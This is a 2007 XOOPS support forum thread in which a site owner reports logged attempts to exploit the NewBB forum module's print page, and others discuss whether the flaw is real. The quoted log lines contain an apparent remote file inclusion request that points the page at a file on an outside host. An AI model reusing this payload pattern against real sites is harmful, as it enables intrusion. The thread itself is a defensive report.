1
icepick66
NewBB print exploit?
  • 2007/9/6 18:34

  • icepick66

  • Just popping in

  • Posts: 20

  • Since: 2004/9/25


NewBB version installed: Newbb 2 (2.02)
Xoops protector picked up somone trying to exploit newbb's print page:
2007/8/29 11:41:08      Guests      200.46.200.3
libwww
-perl/5.43     ISOCOM     Isolated comment-in found. (17400/*/newbb/print.php?forum=*topic_id=*http://148.245.107.2/.ssh/safe.txt?)
    2007/8/29 11:31:38     Guests     222.236.44.50
libwww-perl/5.79     ISOCOM     Isolated comment-in found. (17400/*/
newbb/print.php?forum=*topic_id=*http://148.245.107.2/.ssh/safe.txt?)

Just concurned for people who dont have protector installed

2
mortuk
Re: NewBB print exploit?
  • 2007/9/6 21:33

  • mortuk

  • Not too shy to talk

  • Posts: 122

  • Since: 2005/12/13


old version - why u use this?

3
Peekay
Re: NewBB print exploit?
  • 2007/9/6 22:39

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


CBB is based on NewBB so much of the same code may be used in CBB. It would be good to know from the developer if this is a real vulnerability.
A thread is for life. Not just for Christmas.

4
zyspec
Re: NewBB print exploit?
  • 2007/9/7 1:52

  • zyspec

  • Module Developer

  • Posts: 1095

  • Since: 2004/9/21


I just looked at CBB (ver 3.05) and it sanatizes the 'forum' and 'topic_id' input variables - so this may be from an older version of NewBB (although ver 2.0.2 appears to sanitize this correctly too).

Login

Who's Online

168 user(s) are online (122 user(s) are browsing Support Forums)


Members: 0


Guests: 168


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits